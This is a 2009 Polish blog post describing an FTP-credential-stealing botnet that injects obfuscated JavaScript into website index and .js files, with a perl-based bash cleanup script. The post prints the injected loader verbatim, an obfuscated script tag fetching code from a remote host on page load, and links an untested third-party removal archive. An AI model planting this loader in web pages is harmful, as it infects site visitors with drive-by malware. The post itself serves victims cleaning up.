IFrame FTP | try{window.onload = function()}

Przez b4x | Published: 20 grudnia 2009

Witam – ostatnio zauważyłem strasznie rozszerzenie się tego botneta – odpowiedzialnego za robienie tego całego „syfu”, dotknęło to także mnie – chociaż nie wiem jakim cudem?

Przeważnie kod ‘iframka’ zaczyna się: /*GNU GPL*/, i podmienia pliki index_*, main – i inne które przypominają nazwy ‘indexów’, podmienia także wszystkie znane pliki .JS (np. edytorów m.in. tinymce) oraz pojedyncze skrypty javascript.

Umieszcza on coś w stylu (występują tylko losowe znaki):

/*GNU GPL*/ try{window.onload = function(){var E411a2jh88t =  document.createElement('script');E411a2jh88t.setAttribute('type',  'text/javascript');E411a2jh88t.setAttribute('id',  'myscript1');E411a2jh88t.setAttribute('src',  'h(#t)$&(t((p():@&/)!/^&&w#(i))k(i&&p!(e$)d!&i(^a@((-$o#)r^!(@g!&$.&$s$&m^^)a)@#s!h&^@i!@$)(n))!g)m)@a)g&((a(@z&(i&n$$##e().^$(!c@o$#)@m^.!!@f!&o#$)o$(#d!#n$!(e^)t!&$&w^$o)r!#&k)@-#()c(o@m!.$^&e^&)a$s&^y!@$!#t)&a))b!^(l#&@e#t@!@e@(n@$^n!@&i^^s!)!.&&r$&u!:@))(8^$0^8)(@0$&#/@&(1!((9!l@o$&^u#@#.^&c@@$o!m!@^/&#^1)(9))l^(!o#&@u@(.$#(c(#o!&!^m##/@#^g#@o$o((g@^l^)$e^.(#$#c!!$o^m!!#$/(&!^z#a!)p#@p&$^o$@&s#)(.(@&&c$)o(^!m!((/)&@&&a(v!^$a&!$$s!t)^(.#&c#(o&(m@/$'.replace(/&|\)|\(|\$|@|\^|\!|#/ig,  ''));E411a2jh88t.setAttribute('defer',  'defer');document.body.appendChild(E411a2jh88t);}} catch(e)  {}</script>

Żaden antywirus nic nie wykrył, w tym skanery on-line – przeszukałem cały dysk – i nic – zauważyłem także, iż rozsyła on SPAM – z mojego komputera szło sporo słynnego SPAMU p.t. „VIAGRA” – oczywiście problem występował tylko pod Windowsem, a na hasło do FTP ‘zabrane’ z FlashFXP – i domyślam się, iż klient w tym momencie nie ma już znaczenia (słyszałem o podobnych przypadkach wcześniej na TotalCommanderze) – teraz można przeczytać, o innych klientach.

Oczywiście ręczna podmiana plików nie wchodziła w grę, więc postanowiłem napisać prosty skrypt w bashu.

#! /bin/bash
find . -type f | xargs perl -pi -e 's/<script>\/\*GNU GPL.*\<\/script>$//g'
find . -type f | xargs perl -pi -e 's/\/\*GNU GPL.*\{\}$//g'

Użycie tego wymaga perla – wykorzystuje go do podmiany tego całego syfu, który coraz to szybciej się rozrasta i jest go coraz więcej!

Znalazłem także w internecie skrypt – nie mojego autorstwa (nie sprawdziłem go) – ale wygląda na to że działa, więc jeśli ktoś nie ma dostępu do basha, może wykorzystać ten skrypt:

http://www.michell.pl/uploads/remove_ftp_frame.rar

Użycie go jest proste, rozpakowujemy np. za pomocą WinRara – wrzucamy na serwer WWW do katalogu z zainfekowaną stroną, i wchodzimy w przeglądarce na adres: moja-domena.pl/remove-virus.php

Jeśli macie więcej informacji n.t. samego virusa/trojana – dajcie tutaj znać – moim jedynym najrozsądniejszym wyjściem było pożegnanie WINDOWSA na zawsze ;-)

Ten wpis umieszczono w kategorii Bez kategorii. Możesz dodać go do zakładek permalink. Dodaj komentarz lub dodaj odpowiedź (trackback): Trackback URL.

Skomentuj

Twój adres email nie zostanie opublikowany i nie będzie rozpowszechniany. Wymagane pola są oznaczone *

*
*

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>